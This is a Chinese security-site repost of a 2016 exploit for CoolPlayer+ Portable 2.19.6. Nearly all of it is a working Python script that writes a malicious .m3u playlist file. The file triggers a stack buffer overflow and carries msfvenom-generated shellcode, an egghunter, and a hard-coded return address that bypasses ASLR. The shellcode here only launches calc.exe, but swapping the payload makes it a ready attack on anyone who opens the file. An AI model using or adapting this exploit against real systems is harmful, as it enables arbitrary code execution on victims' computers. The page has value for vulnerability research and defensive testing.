首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass) 来源：vfocus.net 作者：Ganeshen 发布时间：2016-07-27   # Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] # Exploit Author: [Karn Ganeshen] # Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom] # Version: [Current version 2.19.6] # Tested on: [Windows Vista Ultimate SP2] # # Couple of bof exploits for older versions already on EDB: # https://www.exploit-db.com/search/?action=search&description=coolplayer   #!/usr/bin/python   total_buf = 2000   filename="evil.m3u"   # msfvenom -p windows/exec cmd=calc.exe -b \x00\x0a\x0c\0d EXITFUN=thread -f c # Payload size: 220 bytes   shellcode = ("\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x9a\xc7\xdb\xe9\x31\xc9\xb1" "\x31\x31\x58\x18\x83\xe8\xfc\x03\x58\x8e\x25\x2e\x15\x46\x2b" "\xd1\xe6\x96\x4c\x5b\x03\xa7\x4c\x3f\x47\x97\x7c\x4b\x05\x1b" "\xf6\x19\xbe\xa8\x7a\xb6\xb1\x19\x30\xe0\xfc\x9a\x69\xd0\x9f" "\x18\x70\x05\x40\x21\xbb\x58\x81\x66\xa6\x91\xd3\x3f\xac\x04" "\xc4\x34\xf8\x94\x6f\x06\xec\x9c\x8c\xde\x0f\x8c\x02\x55\x56" "\x0e\xa4\xba\xe2\x07\xbe\xdf\xcf\xde\x35\x2b\xbb\xe0\x9f\x62" "\x44\x4e\xde\x4b\xb7\x8e\x26\x6b\x28\xe5\x5e\x88\xd5\xfe\xa4" "\xf3\x01\x8a\x3e\x53\xc1\x2c\x9b\x62\x06\xaa\x68\x68\xe3\xb8" "\x37\x6c\xf2\x6d\x4c\x88\x7f\x90\x83\x19\x3b\xb7\x07\x42\x9f" "\xd6\x1e\x2e\x4e\xe6\x41\x91\x2f\x42\x09\x3f\x3b\xff\x50\x55" "\xba\x8d\xee\x1b\xbc\x8d\xf0\x0b\xd5\xbc\x7b\xc4\xa2\x40\xae" "\xa1\x5d\x0b\xf3\x83\xf5\xd2\x61\x96\x9b\xe4\x5f\xd4\xa5\x66" "\x6a\xa4\x51\x76\x1f\xa1\x1e\x30\xf3\xdb\x0f\xd5\xf3\x48\x2f" "\xfc\x97\x0f\xa3\x9c\x79\xaa\x43\x06\x86")   # Egghunter - 32 bytes eggh = ("\x66\x81\xca\xff\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x54\x30\x30\x57\x8b\xfa" "\xaf\x75\xea\xaf\x75\xe7\xff\xe7")   # EIP overwrite appears to depend upon location from where the evil file is loaded from # Tested from location - C:\ # For e.g. offset will be different if file is loaded from C: (260) vs C:\Windows\ (249)   junk = "A"*28 eip = "\xa1\x99\x42\x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh]   evil = junk + eggh + "\x90"*200 + eip + "\x90"*18 + "T00WT00W" + shellcode + "\x90"*1490   file = open(filename , 'w') file.write(evil) file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Drupal CODER Module 2.5 - Remo ·PHP 7.0.8 / 5.6.23 / 5.5.37 - ·MediaCoder 0.8.43.5852 - .m3u ·Ubee EVW3226 Modem/Router 1.0. ·Barracuda Spam & Virus Firewal ·Technicolor TC7200 Modem/Route ·Barracuda Web App Firewall 8.0 ·Bellini/Supercook Wi-Fi Yumi S ·Apache 2.4.7 & PHP <= 7.0.2 - ·Barracuda Web App Firewall 8.0 ·mail.local(8) (NetBSD) - Local ·Centreon 2.5.3 - Web Useralias   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved